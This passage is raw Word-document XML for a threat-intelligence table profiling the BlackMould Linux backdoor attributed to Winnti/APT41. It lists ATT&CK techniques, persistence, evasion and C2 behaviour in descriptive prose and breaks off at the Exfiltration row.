            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E4461A4" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">BlackMould is a Linux backdoor associated with the Chinese threat group </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Winnti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>. It is designed to provide persistent remote access to compromised systems and supports command execution, file manipulation, and communication with attacker-controlled infrastructure. The malware is commonly deployed against enterprise and gaming-sector targets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="121FDA9E" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A0199A0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A6F7D1F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Winnti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> Group, APT41</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="51E6AFAF" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B129665" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="432086F8" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="23BD0730" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19EEB361" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75644BCE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Command and Scripting Interpreter </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Ingress Tool Transfer </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1573</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Encrypted Channel </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1071</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Application Layer Protocol </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1036</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Masquerading </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1543</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Create or Modify System Process </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7135E7BB" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25C97EE7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E161BD1" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Executed as a malicious ELF binary on Linux systems. Attackers deploy it after initial compromise to establish remote shell access and execute attacker-supplied commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="51F8ADED" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C07E3B9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15B8148A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses modified startup scripts, malicious services, and daemon-like execution to maintain persistence across reboots.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6F151E27" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C3534FD" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303EAA39" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No specific privilege escalation module publicly documented; attackers generally deploy BlackMould after obtaining elevated access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6BBB055D" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1832A905" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8AD930" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses masquerading, encrypted communications, obfuscated code, and stealthy process naming to avoid detection on Linux systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7F220939" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00C9B574" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5542CF92" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No direct credential dumping functionality publicly documented for BlackMould itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0C054C48" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57C8DEAB" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="501335D7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supports basic system reconnaissance, including host information gathering and environment inspection through remote command execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4B030848" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424C0B19" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A52869C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No dedicated lateral movement capability documented; remote shell access may be used manually by attackers for pivoting activities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3F865E06" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E618480" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E25143F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Communicates with attacker-controlled servers over encrypted channels and application-layer protocols to receive commands and transmit results.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="2ED9B170" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20D1DB4E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
